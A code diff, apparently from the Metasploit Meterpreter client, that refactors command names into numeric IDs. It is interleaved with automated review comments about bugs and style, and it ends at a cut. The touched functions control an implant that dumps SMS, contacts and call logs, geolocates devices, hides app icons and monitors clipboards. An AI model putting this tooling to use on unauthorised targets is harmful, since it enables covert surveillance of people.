@@ -95,15 +101,18 @@ def create_named_pipe_pivot(opts) request.add_tlv(TLV_TYPE_PIVOT_STAGE_DATA, stage) request.add_tlv(TLV_TYPE_PIVOT_STAGE_DATA_SIZE, stage.length) - response = self.client.send_request(request) + self.client.send_request(request) end # # Get a list of loaded commands for the given extension. # def get_loaded_extension_commands(extension_name) - request = Packet.create_request('core_enumextcmd') - request.add_tlv(TLV_TYPE_STRING, extension_name) + request = Packet.create_request(COMMAND_ID_CORE_ENUMEXTCMD) + + start = Rex::Post::Meterpreter::ExtensionMapper.get_extension_id(extension_name) + request.add_tlv(TLV_TYPE_UINT, start) + request.add_tlv(TLV_TYPE_LENGTH, COMMAND_ID_RANGE) begin response = self.client.send_packet_wait_response(request, self.client.response_timeout) @@ -133,7 +142,7 @@ def get_loaded_extension_commands(extension_name) end def transport_list - request = Packet.create_request('core_transport_list') + request = Packet.create_request(COMMAND_ID_CORE_TRANSPORT_LIST) response = client.send_request(request) result = { @@ -163,7 +172,7 @@ def transport_list # Set associated transport timeouts for the currently active transport. # def set_transport_timeouts(opts={}) - request = Packet.create_request('core_transport_set_timeouts') + request = Packet.create_request(COMMAND_ID_CORE_TRANSPORT_SET_TIMEOUTS) if opts[:session_exp] request.add_tlv(TLV_TYPE_TRANS_SESSION_EXP, opts[:session_exp]) @@ -239,7 +248,7 @@ def load_library(opts) end # Create a request packet - request = Packet.create_request('core_loadlib') + request = Packet.create_request(COMMAND_ID_CORE_LOADLIB) # If we must upload the library, do so now if (load_flags & LOAD_LIBRARY_FLAG_LOCAL) != LOAD_LIBRARY_FLAG_LOCAL 
@@ -263,7 +272,7 @@ def load_library(opts) # name if opts['Extension'] if client.binary_suffix and client.binary_suffix.size > 1 - m = /(.*)\.(.*)/.match(library_path) + /(.*)\.(.*)/.match(library_path) suffix = $2 elsif client.binary_suffix.size == 1 suffix = client.binary_suffix[0] @@ -381,7 +390,7 @@ def use(mod, opts = { }) # Set the UUID on the target session. # def set_uuid(uuid) - request = Packet.create_request('core_set_uuid') + request = Packet.create_request(COMMAND_ID_CORE_SET_UUID) request.add_tlv(TLV_TYPE_UUID, uuid.to_raw) client.send_request(request) @@ -393,7 +402,7 @@ def set_uuid(uuid) # Set the session GUID on the target session. # def set_session_guid(guid) - request = Packet.create_request('core_set_session_guid') + request = Packet.create_request(COMMAND_ID_CORE_SET_SESSION_GUID) request.add_tlv(TLV_TYPE_SESSION_GUID, guid) client.send_request(request) @@ -405,7 +414,7 @@ def set_session_guid(guid) # Get the session GUID from the target session. # def get_session_guid(timeout=nil) - request = Packet.create_request('core_get_session_guid') + request = Packet.create_request(COMMAND_ID_CORE_GET_SESSION_GUID) args = [request] args << timeout if timeout @@ -419,7 +428,7 @@ def get_session_guid(timeout=nil) # Get the machine ID from the target session. # def machine_id(timeout=nil) - request = Packet.create_request('core_machine_id') + request = Packet.create_request(COMMAND_ID_CORE_MACHINE_ID) args = [request] args << timeout if timeout @@ -441,7 +450,7 @@ def machine_id(timeout=nil) # def native_arch(timeout=nil) # Not all meterpreter implementations support this - request = Packet.create_request('core_native_arch') + request = Packet.create_request(COMMAND_ID_CORE_NATIVE_ARCH) args = [ request ] args << timeout if timeout 
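Review bot: Dropping the `m =` assignment in `load_library` leaves `suffix = $2` depending on the implicit last-match global set by the preceding line, which silently breaks if another regex is ever inserted between them. Keeping the MatchData is clearer: `m = /(.*)\.(.*)/.match(library_path)` followed by `suffix = m && m[2]`, which yields nil on no match exactly as `$2` does. `load_library` starts and ends outside the hunk.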
@@ -455,7 +464,7 @@ def native_arch(timeout=nil) # Remove a transport from the session based on the provided options. # def transport_remove(opts={}) - request = transport_prepare_request('core_transport_remove', opts) + request = transport_prepare_request(COMMAND_ID_CORE_TRANSPORT_REMOVE, opts) return false unless request @@ -468,7 +477,7 @@ def transport_remove(opts={}) # Add a transport to the session based on the provided options. # def transport_add(opts={}) - request = transport_prepare_request('core_transport_add', opts) + request = transport_prepare_request(COMMAND_ID_CORE_TRANSPORT_ADD, opts) return false unless request @@ -481,7 +490,7 @@ def transport_add(opts={}) # Change the currently active transport on the session. # def transport_change(opts={}) - request = transport_prepare_request('core_transport_change', opts) + request = transport_prepare_request(COMMAND_ID_CORE_TRANSPORT_CHANGE, opts) return false unless request @@ -496,7 +505,7 @@ def transport_change(opts={}) def transport_sleep(seconds) return false if seconds == 0 - request = Packet.create_request('core_transport_sleep') + request = Packet.create_request(COMMAND_ID_CORE_TRANSPORT_SLEEP) # we're reusing the comms timeout setting here instead of # creating a whole new TLV value @@ -509,7 +518,7 @@ def transport_sleep(seconds) # Change the active transport to the next one in the transport list. # def transport_next - request = Packet.create_request('core_transport_next') + request = Packet.create_request(COMMAND_ID_CORE_TRANSPORT_NEXT) client.send_request(request) return true end @@ -518,7 +527,7 @@ def transport_next # Change the active transport to the previous one in the transport list. # def transport_prev - request = Packet.create_request('core_transport_prev') + request = Packet.create_request(COMMAND_ID_CORE_TRANSPORT_PREV) client.send_request(request) return true end 
@@ -530,7 +539,7 @@ def enable_ssl_hash_verify # Not supported unless we have a socket with SSL enabled return nil unless self.client.sock.type? == 'tcp-ssl' - request = Packet.create_request('core_transport_setcerthash') + request = Packet.create_request(COMMAND_ID_CORE_TRANSPORT_SETCERTHASH) hash = Rex::Text.sha1_raw(self.client.sock.sslctx.cert.to_der) request.add_tlv(TLV_TYPE_TRANS_CERT_HASH, hash) @@ -547,7 +556,7 @@ def disable_ssl_hash_verify # Not supported unless we have a socket with SSL enabled return nil unless self.client.sock.type? == 'tcp-ssl' - request = Packet.create_request('core_transport_setcerthash') + request = Packet.create_request(COMMAND_ID_CORE_TRANSPORT_SETCERTHASH) # send an empty request to disable it client.send_request(request) @@ -564,7 +573,7 @@ def get_ssl_hash_verify # Not supported unless we have a socket with SSL enabled return nil unless self.client.sock.type? == 'tcp-ssl' - request = Packet.create_request('core_transport_getcerthash') + request = Packet.create_request(COMMAND_ID_CORE_TRANSPORT_GETCERTHASH) response = client.send_request(request) return response.get_tlv_value(TLV_TYPE_TRANS_CERT_HASH) @@ -617,7 +626,7 @@ def migrate(target_pid, writable_dir = nil, opts = {}) migrate_payload = generate_migrate_payload(target_process) # Build the migration request - request = Packet.create_request('core_migrate') + request = Packet.create_request(COMMAND_ID_CORE_MIGRATE) request.add_tlv(TLV_TYPE_MIGRATE_PID, target_pid) request.add_tlv(TLV_TYPE_MIGRATE_PAYLOAD_LEN, migrate_payload.length) @@ -641,7 +650,7 @@ def migrate(target_pid, writable_dir = nil, opts = {}) # Send the migration request. Timeout can be specified by the caller, or set to a min # of 60 seconds. timeout = [(opts[:timeout] || 0), 60].max - response = client.send_request(request, timeout) + client.send_request(request, timeout) # Post-migration the session doesn't have encryption any more. # Set the TLV key to nil to make sure that the old key isn't used 
@@ -709,7 +718,7 @@ def secure # Shuts the session down # def shutdown - request = Packet.create_request('core_shutdown') + request = Packet.create_request(COMMAND_ID_CORE_SHUTDOWN) if client.passive_service # If this is a HTTP/HTTPS session we need to wait a few seconds @@ -740,7 +749,7 @@ def negotiate_tlv_encryption rsa_key = OpenSSL::PKey::RSA.new(2048) rsa_pub_key = rsa_key.public_key - request = Packet.create_request('core_negotiate_tlv_encryption') + request = Packet.create_request(COMMAND_ID_CORE_NEGOTIATE_TLV_ENCRYPTION) request.add_tlv(TLV_TYPE_RSA_PUB_KEY, rsa_pub_key.to_pem) begin diff --git a/lib/rex/post/meterpreter/core_ids.rb b/lib/rex/post/meterpreter/core_ids.rb new file mode 100644 index 0000000000000..36a76e6893896 --- /dev/null +++ b/lib/rex/post/meterpreter/core_ids.rb 
@@ -0,0 +1,51 @@
+# -*- coding: binary -*-
+
+module Rex
+module Post
+module Meterpreter
+
+# Effectively maps to the number of commands an extension can
+# have. Each extension ID starts at a range boundary and is used
+# to identify extensions.
+COMMAND_ID_RANGE = 1000
+
+# ID for the extension (needs to be a multiple of 1000)
+EXTENSION_ID_CORE = 0
+
+COMMAND_ID_CORE_CHANNEL_CLOSE = EXTENSION_ID_CORE + 1
+COMMAND_ID_CORE_CHANNEL_EOF = EXTENSION_ID_CORE + 2
+COMMAND_ID_CORE_CHANNEL_INTERACT = EXTENSION_ID_CORE + 3
+COMMAND_ID_CORE_CHANNEL_OPEN = EXTENSION_ID_CORE + 4
+COMMAND_ID_CORE_CHANNEL_READ = EXTENSION_ID_CORE + 5
+COMMAND_ID_CORE_CHANNEL_SEEK = EXTENSION_ID_CORE + 6
+COMMAND_ID_CORE_CHANNEL_TELL = EXTENSION_ID_CORE + 7
+COMMAND_ID_CORE_CHANNEL_WRITE = EXTENSION_ID_CORE + 8
+COMMAND_ID_CORE_CONSOLE_WRITE = EXTENSION_ID_CORE + 9
+COMMAND_ID_CORE_ENUMEXTCMD = EXTENSION_ID_CORE + 10
+COMMAND_ID_CORE_GET_SESSION_GUID = EXTENSION_ID_CORE + 11
+COMMAND_ID_CORE_LOADLIB = EXTENSION_ID_CORE + 12
+COMMAND_ID_CORE_MACHINE_ID = EXTENSION_ID_CORE + 13
+COMMAND_ID_CORE_MIGRATE = EXTENSION_ID_CORE + 14
+COMMAND_ID_CORE_NATIVE_ARCH = EXTENSION_ID_CORE + 15
+COMMAND_ID_CORE_NEGOTIATE_TLV_ENCRYPTION = EXTENSION_ID_CORE + 16
+COMMAND_ID_CORE_PATCH_URL = EXTENSION_ID_CORE + 17
+COMMAND_ID_CORE_PIVOT_ADD = EXTENSION_ID_CORE + 18
+COMMAND_ID_CORE_PIVOT_REMOVE = EXTENSION_ID_CORE + 19
+COMMAND_ID_CORE_PIVOT_SESSION_DIED = EXTENSION_ID_CORE + 20
+COMMAND_ID_CORE_SET_SESSION_GUID = EXTENSION_ID_CORE + 21
+COMMAND_ID_CORE_SET_UUID = EXTENSION_ID_CORE + 22
+COMMAND_ID_CORE_SHUTDOWN = EXTENSION_ID_CORE + 23
+COMMAND_ID_CORE_TRANSPORT_ADD = EXTENSION_ID_CORE + 24
+COMMAND_ID_CORE_TRANSPORT_CHANGE = EXTENSION_ID_CORE + 25
+COMMAND_ID_CORE_TRANSPORT_GETCERTHASH = EXTENSION_ID_CORE + 26
+COMMAND_ID_CORE_TRANSPORT_LIST = EXTENSION_ID_CORE + 27
+COMMAND_ID_CORE_TRANSPORT_NEXT = EXTENSION_ID_CORE + 28
+COMMAND_ID_CORE_TRANSPORT_PREV = EXTENSION_ID_CORE + 29
+COMMAND_ID_CORE_TRANSPORT_REMOVE = EXTENSION_ID_CORE + 30
+COMMAND_ID_CORE_TRANSPORT_SETCERTHASH = EXTENSION_ID_CORE + 31
+COMMAND_ID_CORE_TRANSPORT_SET_TIMEOUTS = EXTENSION_ID_CORE + 32
+COMMAND_ID_CORE_TRANSPORT_SLEEP = EXTENSION_ID_CORE + 33
+
+end
+end
+end
diff --git a/lib/rex/post/meterpreter/extension.rb b/lib/rex/post/meterpreter/extension.rb
index 7db256f222bf1..4789c1d7684f7 100644
--- a/lib/rex/post/meterpreter/extension.rb
+++ b/lib/rex/post/meterpreter/extension.rb
@@ -24,9 +24,9 @@ def initialize(client, name)
 #
 # The name of the extension.
 #
- attr_accessor :name
+ attr_reader :name
 protected
- attr_accessor :client # :nodoc:
+ attr_reader :client # :nodoc:
 end
 end; end; end
diff --git a/lib/rex/post/meterpreter/extension_mapper.rb b/lib/rex/post/meterpreter/extension_mapper.rb
new file mode 100644
index 0000000000000..d062c54d40016
--- /dev/null
+++ b/lib/rex/post/meterpreter/extension_mapper.rb
@@ -0,0 +1,32 @@
+# -*- coding: binary -*-
+
+module Rex
+module Post
+module Meterpreter
+
+class ExtensionMapper
+
+ @@klasses = {}
+
+ def self.get_extension_id(name)
+ k = self.get_extension_klass(name)
+ k.id
+ end
+
+ def self.get_extension_klass(name)
+ name.capitalize!
+
+ unless @@klasses[name]
+ require("rex/post/meterpreter/extensions/#{name.downcase}/#{name.downcase}")
+ s = name.to_sym
+ @@klasses[name] = Rex::Post::Meterpreter::Extensions.const_get(s).const_get(s)
+ end
+
+ @@klasses[name.downcase]
+ end
+
+end
+
+end
+end
+end
diff --git a/lib/rex/post/meterpreter/extensions/android/android.rb b/lib/rex/post/meterpreter/extensions/android/android.rb
index 60e443812d4d5..4a11370d7dc05 100644
--- a/lib/rex/post/meterpreter/extensions/android/android.rb
+++ b/lib/rex/post/meterpreter/extensions/android/android.rb
@@ -43,6 +43,10 @@ class Android < Extension
 'dump' => COLLECT_ACTION_DUMP
 }
+ def self.extension_id
+ EXTENSION_ID_ANDROID
+ end
+
 def initialize(client)
 super(client, 'android')
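Review bot: The comment on `EXTENSION_ID_CORE` says the id "needs to be a multiple of 1000" while the range is defined two lines above as `COMMAND_ID_RANGE = 1000`; naming the constant keeps the two from drifting: `# ID for the extension (must be a multiple of COMMAND_ID_RANGE)`. The same literal comment recurs on `EXTENSION_ID_ANDROID` in android/tlv.rb later in this patch.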
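Review bot: `get_extension_klass` caches the loaded class under the capitalised `name` but returns `@@klasses[name.downcase]`, so it returns nil for every caller, and `get_extension_id` then calls `k.id` on nil — and even with the right class, the extensions in this patch define `self.extension_id` (ClientCore, Android, AppApi), not `id`. `name.capitalize!` also mutates the caller's string and raises FrozenError on a frozen literal, which `add_extension` in client.rb and `extension_init_block` in config.rb now reach indirectly. Separately, `capitalize` turns "appapi" into `Appapi` while the module visible later in this patch is `AppApi`; the constant-diff lookup removed from client.rb tolerated such names, so each extension whose module is not a plain capitalisation should be checked before the mapper is relied on for it. The rewrite below uses one cache key, a non-mutating capitalize and `extension_id`.
```ruby
  def self.get_extension_id(name)
    get_extension_klass(name).extension_id
  end

  def self.get_extension_klass(name)
    name = name.capitalize
    unless @@klasses[name]
      require("rex/post/meterpreter/extensions/#{name.downcase}/#{name.downcase}")
      s = name.to_sym
      @@klasses[name] = Rex::Post::Meterpreter::Extensions.const_get(s).const_get(s)
    end
    @@klasses[name]
  end
```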
@@ -66,20 +70,20 @@ def collect_types end def device_shutdown(n) - request = Packet.create_request('android_device_shutdown') + request = Packet.create_request(COMMAND_ID_ANDROID_DEVICE_SHUTDOWN) request.add_tlv(TLV_TYPE_SHUTDOWN_TIMER, n) response = client.send_request(request) response.get_tlv(TLV_TYPE_SHUTDOWN_OK).value end def set_audio_mode(n) - request = Packet.create_request('android_set_audio_mode') + request = Packet.create_request(COMMAND_ID_ANDROID_SET_AUDIO_MODE) request.add_tlv(TLV_TYPE_AUDIO_MODE, n) - response = client.send_request(request) + client.send_request(request) end def interval_collect(opts) - request = Packet.create_request('android_interval_collect') + request = Packet.create_request(COMMAND_ID_ANDROID_INTERVAL_COLLECT) request.add_tlv(TLV_TYPE_COLLECT_ACTION, COLLECT_ACTIONS[opts[:action]]) request.add_tlv(TLV_TYPE_COLLECT_TYPE, COLLECT_TYPES[opts[:type]]) request.add_tlv(TLV_TYPE_COLLECT_TIMEOUT, opts[:timeout]) @@ -182,7 +186,7 @@ def interval_collect(opts) def dump_sms sms = [] - request = Packet.create_request('android_dump_sms') + request = Packet.create_request(COMMAND_ID_ANDROID_DUMP_SMS) response = client.send_request(request) response.each(TLV_TYPE_SMS_GROUP) do |p| @@ -199,7 +203,7 @@ def dump_sms def dump_contacts contacts = [] - request = Packet.create_request('android_dump_contacts') + request = Packet.create_request(COMMAND_ID_ANDROID_DUMP_CONTACTS) response = client.send_request(request) response.each(TLV_TYPE_CONTACT_GROUP) do |p| @@ -214,7 +218,7 @@ def dump_contacts def geolocate loc = [] - request = Packet.create_request('android_geolocate') + request = Packet.create_request(COMMAND_ID_ANDROID_GEOLOCATE) response = client.send_request(request) loc << { @@ -227,7 +231,7 @@ def geolocate def dump_calllog log = [] - request = Packet.create_request('android_dump_calllog') + request = Packet.create_request(COMMAND_ID_ANDROID_DUMP_CALLLOG) response = client.send_request(request) response.each(TLV_TYPE_CALLLOG_GROUP) do |p| 
@@ -243,19 +247,19 @@ def dump_calllog end def check_root - request = Packet.create_request('android_check_root') + request = Packet.create_request(COMMAND_ID_ANDROID_CHECK_ROOT) response = client.send_request(request) response.get_tlv(TLV_TYPE_CHECK_ROOT_BOOL).value end def hide_app_icon - request = Packet.create_request('android_hide_app_icon') + request = Packet.create_request(COMMAND_ID_ANDROID_HIDE_APP_ICON) response = client.send_request(request) response.get_tlv_value(TLV_TYPE_ICON_NAME) end def activity_start(uri) - request = Packet.create_request('android_activity_start') + request = Packet.create_request(COMMAND_ID_ANDROID_ACTIVITY_START) request.add_tlv(TLV_TYPE_URI_STRING, uri) response = client.send_request(request) if response.get_tlv(TLV_TYPE_ACTIVITY_START_RESULT).value @@ -266,13 +270,13 @@ def activity_start(uri) end def set_wallpaper(data) - request = Packet.create_request('android_set_wallpaper') + request = Packet.create_request(COMMAND_ID_ANDROID_SET_WALLPAPER) request.add_tlv(TLV_TYPE_WALLPAPER_DATA, data) - response = client.send_request(request) + client.send_request(request) end def send_sms(dest, body, dr) - request = Packet.create_request('android_send_sms') + request = Packet.create_request(COMMAND_ID_ANDROID_SEND_SMS) request.add_tlv(TLV_TYPE_SMS_ADDRESS, dest) request.add_tlv(TLV_TYPE_SMS_BODY, body) request.add_tlv(TLV_TYPE_SMS_DR, dr) @@ -289,7 +293,7 @@ def send_sms(dest, body, dr) end def wlan_geolocate - request = Packet.create_request('android_wlan_geolocate') + request = Packet.create_request(COMMAND_ID_ANDROID_WLAN_GEOLOCATE) response = client.send_request(request, 30) networks = [] response.each(TLV_TYPE_WLAN_GROUP) do |p| 
@@ -303,7 +307,7 @@ def wlan_geolocate end def sqlite_query(dbname, query, writeable) - request = Packet.create_request('android_sqlite_query') + request = Packet.create_request(COMMAND_ID_ANDROID_SQLITE_QUERY) request.add_tlv(TLV_TYPE_SQLITE_NAME, dbname) request.add_tlv(TLV_TYPE_SQLITE_QUERY, query) request.add_tlv(TLV_TYPE_SQLITE_WRITE, writeable) @@ -329,9 +333,9 @@ def sqlite_query(dbname, query, writeable) end def wakelock(flags) - request = Packet.create_request('android_wakelock') + request = Packet.create_request(COMMAND_ID_ANDROID_WAKELOCK) request.add_tlv(TLV_TYPE_FLAGS, flags) - response = client.send_request(request) + client.send_request(request) end end diff --git a/lib/rex/post/meterpreter/extensions/android/tlv.rb b/lib/rex/post/meterpreter/extensions/android/tlv.rb index 742a7b7d37076..871573020dd0b 100644 --- a/lib/rex/post/meterpreter/extensions/android/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/android/tlv.rb 
@@ -7,6 +7,26 @@ module Meterpreter module Extensions module Android +# ID for the extension (needs to be a multiple of 1000) +EXTENSION_ID_ANDROID = 5000 + +# Associated command ids +COMMAND_ID_ANDROID_ACTIVITY_START = EXTENSION_ID_ANDROID + 1 +COMMAND_ID_ANDROID_CHECK_ROOT = EXTENSION_ID_ANDROID + 2 +COMMAND_ID_ANDROID_DEVICE_SHUTDOWN = EXTENSION_ID_ANDROID + 3 +COMMAND_ID_ANDROID_DUMP_CALLLOG = EXTENSION_ID_ANDROID + 4 +COMMAND_ID_ANDROID_DUMP_CONTACTS = EXTENSION_ID_ANDROID + 5 +COMMAND_ID_ANDROID_DUMP_SMS = EXTENSION_ID_ANDROID + 6 +COMMAND_ID_ANDROID_GEOLOCATE = EXTENSION_ID_ANDROID + 7 +COMMAND_ID_ANDROID_HIDE_APP_ICON = EXTENSION_ID_ANDROID + 8 +COMMAND_ID_ANDROID_INTERVAL_COLLECT = EXTENSION_ID_ANDROID + 9 +COMMAND_ID_ANDROID_SEND_SMS = EXTENSION_ID_ANDROID + 10 +COMMAND_ID_ANDROID_SET_AUDIO_MODE = EXTENSION_ID_ANDROID + 11 +COMMAND_ID_ANDROID_SET_WALLPAPER = EXTENSION_ID_ANDROID + 12 +COMMAND_ID_ANDROID_SQLITE_QUERY = EXTENSION_ID_ANDROID + 13 +COMMAND_ID_ANDROID_WAKELOCK = EXTENSION_ID_ANDROID + 14 +COMMAND_ID_ANDROID_WLAN_GEOLOCATE = EXTENSION_ID_ANDROID + 15 + TLV_TYPE_SMS_ADDRESS = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9001) TLV_TYPE_SMS_BODY = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9002) TLV_TYPE_SMS_TYPE = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9003) diff --git a/lib/rex/post/meterpreter/extensions/appapi/appapi.rb b/lib/rex/post/meterpreter/extensions/appapi/appapi.rb index b85bb7d281605..06878fe0a1364 100644 --- a/lib/rex/post/meterpreter/extensions/appapi/appapi.rb +++ b/lib/rex/post/meterpreter/extensions/appapi/appapi.rb @@ -15,6 +15,10 @@ module AppApi ### class AppApi < Extension + def self.extension_id + EXTENSION_ID_APPAPI + end + # # Typical extension initialization routine. # 
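Review bot: The new COMMAND_ID_ANDROID_* constants are numbered alphabetically (+1 … +15) and, per the commit message, are now sent over the wire to the native payloads, yet the only comment is "needs to be a multiple of 1000" — nothing tells the next maintainer that the offsets are a protocol contract. A one-line comment above the block would prevent the obvious mistake of inserting a new command in alphabetical order and renumbering: `# Wire-protocol values shared with the payload side: never renumber existing entries; append new commands after the last one even if that breaks the alphabetical order.` The same applies to the appapi (L40), espia (L41), extapi (L47), incognito (L51), kiwi (L52), lanattacks (L55), mimikatz (L56) and networkpug (L57) tlv.rb hunks. The EXTENSION_ID values (3000, 5000, 6000, 8000, 9000, 11000, 12000, 15000, 17000) are hand-assigned in nine separate files with no visible registry, so a collision would only show up as mis-dispatched commands at runtime; a comment naming where the allocation is tracked, or a load-time uniqueness check, would help if no such registry exists outside this diff.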
@@ -35,7 +39,7 @@ def initialize(client) # Get list of installed applications # def app_list(app_opt) - request = Packet.create_request('appapi_app_list') + request = Packet.create_request(COMMAND_ID_APPAPI_APP_LIST) request.add_tlv(TLV_TYPE_APPS_LIST_OPT, app_opt) response = client.send_request(request) names = [] @@ -50,7 +54,7 @@ def app_list(app_opt) # def app_uninstall(packagename) - request = Packet.create_request('appapi_app_uninstall') + request = Packet.create_request(COMMAND_ID_APPAPI_APP_UNINSTALL) request.add_tlv(TLV_TYPE_APP_PACKAGE_NAME, packagename) response = client.send_request(request) @@ -61,7 +65,7 @@ def app_uninstall(packagename) # Install application # def app_install(apk_path) - request = Packet.create_request('appapi_app_install') + request = Packet.create_request(COMMAND_ID_APPAPI_APP_INSTALL) request.add_tlv(TLV_TYPE_APP_APK_PATH, apk_path) response = client.send_request(request) @@ -72,7 +76,7 @@ def app_install(apk_path) # Start Main Activity for installed application by Package name # def app_run(packagename) - request = Packet.create_request('appapi_app_run') + request = Packet.create_request(COMMAND_ID_APPAPI_APP_RUN) request.add_tlv(TLV_TYPE_APP_PACKAGE_NAME, packagename) response = client.send_request(request) response.get_tlv(TLV_TYPE_APP_RUN_ENUM).value diff --git a/lib/rex/post/meterpreter/extensions/appapi/tlv.rb b/lib/rex/post/meterpreter/extensions/appapi/tlv.rb index 851e9017eb61d..f2b0fbadd34ef 100644 --- a/lib/rex/post/meterpreter/extensions/appapi/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/appapi/tlv.rb @@ -7,6 +7,15 @@ module Meterpreter module Extensions module AppApi +# ID for the extension (needs to be a multiple of 1000) +EXTENSION_ID_APPAPI = 9000 + +# Associated command ids +COMMAND_ID_APPAPI_APP_INSTALL = EXTENSION_ID_APPAPI + 1 +COMMAND_ID_APPAPI_APP_LIST = EXTENSION_ID_APPAPI + 2 +COMMAND_ID_APPAPI_APP_RUN = EXTENSION_ID_APPAPI + 3 +COMMAND_ID_APPAPI_APP_UNINSTALL = EXTENSION_ID_APPAPI + 4 + ## # # Apps 
diff --git a/lib/rex/post/meterpreter/extensions/espia/espia.rb b/lib/rex/post/meterpreter/extensions/espia/espia.rb index 520dcfb33bcfc..06da92e21fdb6 100644 --- a/lib/rex/post/meterpreter/extensions/espia/espia.rb +++ b/lib/rex/post/meterpreter/extensions/espia/espia.rb @@ -16,6 +16,9 @@ module Espia ### class Espia < Extension + def self.extension_id + EXTENSION_ID_ESPIA + end def initialize(client) super(client, 'espia') @@ -29,28 +32,14 @@ def initialize(client) ]) end - def espia_video_get_dev_image() - request = Packet.create_request('espia_video_get_dev_image') - response = client.send_request(request) - - return true - end - - def espia_audio_get_dev_audio(rsecs) - request = Packet.create_request('espia_audio_get_dev_audio') - request.add_tlv(TLV_TYPE_DEV_RECTIME, rsecs) - response = client.send_request(request) - - return true - end - def espia_image_get_dev_screen - request = Packet.create_request( 'espia_image_get_dev_screen' ) + request = Packet.create_request(COMMAND_ID_ESPIA_IMAGE_GET_DEV_SCREEN) response = client.send_request( request ) - if( response.result == 0 ) - return response.get_tlv_value( TLV_TYPE_DEV_SCREEN ) + if response.result == 0 + response.get_tlv_value(TLV_TYPE_DEV_SCREEN) + else + nil end - return nil end end diff --git a/lib/rex/post/meterpreter/extensions/espia/tlv.rb b/lib/rex/post/meterpreter/extensions/espia/tlv.rb index 1ae21b9bb207a..e9d62de91920b 100644 --- a/lib/rex/post/meterpreter/extensions/espia/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/espia/tlv.rb @@ -5,6 +5,12 @@ module Meterpreter module Extensions module Espia +# ID for the extension (needs to be a multiple of 1000) +EXTENSION_ID_ESPIA = 11000 + +# Associated command ids +COMMAND_ID_ESPIA_IMAGE_GET_DEV_SCREEN = EXTENSION_ID_ESPIA + 1 + TLV_TYPE_DEV_IMAGE = TLV_META_TYPE_UINT| (TLV_EXTENSIONS + 911) TLV_TYPE_DEV_AUDIO = TLV_META_TYPE_STRING| (TLV_EXTENSIONS + 912) TLV_TYPE_DEV_SCREEN = TLV_META_TYPE_RAW| (TLV_EXTENSIONS + 913) 
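Review bot: The added `def self.extension_id … end` in Espia runs straight into `def initialize(client)` with no separating blank line, unlike the AppApi, Extapi and Kiwi hunks, and the Incognito hunk (L49) has the same omission. In `espia_image_get_dev_screen` the rewritten call `request = Packet.create_request(COMMAND_ID_ESPIA_IMAGE_GET_DEV_SCREEN)` drops the padded-paren spacing, but the next line `response = client.send_request( request )` keeps it; the `if … else nil end` that follows reads more naturally as `response.get_tlv_value(TLV_TYPE_DEV_SCREEN) if response.result == 0`. With `espia_video_get_dev_image` and `espia_audio_get_dev_audio` deleted, TLV_TYPE_DEV_IMAGE and TLV_TYPE_DEV_AUDIO in the espia tlv.rb hunk appear to have no remaining users unless something outside this diff references them; a comment marking them as retained for wire compatibility, or their removal, would avoid the dangling constants.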
diff --git a/lib/rex/post/meterpreter/extensions/extapi/adsi/adsi.rb b/lib/rex/post/meterpreter/extensions/extapi/adsi/adsi.rb index a141616637795..8c3561cfc2b5c 100644 --- a/lib/rex/post/meterpreter/extensions/extapi/adsi/adsi.rb +++ b/lib/rex/post/meterpreter/extensions/extapi/adsi/adsi.rb @@ -35,7 +35,7 @@ def initialize(client) # @return [Hash] Array of field names with associated results. # def domain_query(domain_name, filter, max_results, page_size, fields) - request = Packet.create_request('extapi_adsi_domain_query') + request = Packet.create_request(COMMAND_ID_EXTAPI_ADSI_DOMAIN_QUERY) request.add_tlv(TLV_TYPE_EXT_ADSI_DOMAIN, domain_name) request.add_tlv(TLV_TYPE_EXT_ADSI_FILTER, filter) diff --git a/lib/rex/post/meterpreter/extensions/extapi/clipboard/clipboard.rb b/lib/rex/post/meterpreter/extensions/extapi/clipboard/clipboard.rb index ef89b2b2489f2..7c6bb8d7e260f 100644 --- a/lib/rex/post/meterpreter/extensions/extapi/clipboard/clipboard.rb +++ b/lib/rex/post/meterpreter/extensions/extapi/clipboard/clipboard.rb @@ -24,7 +24,7 @@ def initialize(client) # (if it's supported). # def get_data(download = false) - request = Packet.create_request('extapi_clipboard_get_data') + request = Packet.create_request(COMMAND_ID_EXTAPI_CLIPBOARD_GET_DATA) if download request.add_tlv(TLV_TYPE_EXT_CLIPBOARD_DOWNLOAD, true) @@ -39,11 +39,11 @@ def get_data(download = false) # Set the target clipboard data to a text value # def set_text(text) - request = Packet.create_request('extapi_clipboard_set_data') + request = Packet.create_request(COMMAND_ID_EXTAPI_CLIPBOARD_SET_DATA) request.add_tlv(TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT_CONTENT, text) - response = client.send_request(request) + client.send_request(request) return true end 
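Review bot: `set_text` still ends with an unconditional `return true` after the rewritten `client.send_request(request)`, so the response is discarded and a failed clipboard write is reported as success unless `send_request` raises on a non-zero result, which is not visible here. The same shape appears in `incognito_snarf_hashes` (L51) and the lanattacks `start`/`reset`/`stop` methods (L53, L54). If `send_request` does raise, the explicit `return true` is redundant Ruby and `true` alone matches the rest of the diff; if it does not, returning `client.send_request(request).result == 0` (the `result` accessor is already used in the espia and dhcp hunks) would surface the outcome to callers.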
@@ -52,7 +52,7 @@ def set_text(text) # Start the clipboard monitor if it hasn't been started. # def monitor_start(opts) - request = Packet.create_request('extapi_clipboard_monitor_start') + request = Packet.create_request(COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_START) request.add_tlv(TLV_TYPE_EXT_CLIPBOARD_MON_WIN_CLASS, opts[:wincls]) request.add_tlv(TLV_TYPE_EXT_CLIPBOARD_MON_CAP_IMG_DATA, opts[:cap_img]) return client.send_request(request) @@ -62,7 +62,7 @@ def monitor_start(opts) # Pause the clipboard monitor if it's running. # def monitor_pause - request = Packet.create_request('extapi_clipboard_monitor_pause') + request = Packet.create_request(COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_PAUSE) return client.send_request(request) end @@ -74,7 +74,7 @@ def monitor_dump(opts) purge = opts[:purge] purge = true if purge.nil? - request = Packet.create_request('extapi_clipboard_monitor_dump') + request = Packet.create_request(COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_DUMP) request.add_tlv(TLV_TYPE_EXT_CLIPBOARD_MON_CAP_IMG_DATA, pull_img) request.add_tlv(TLV_TYPE_EXT_CLIPBOARD_MON_PURGE, purge) @@ 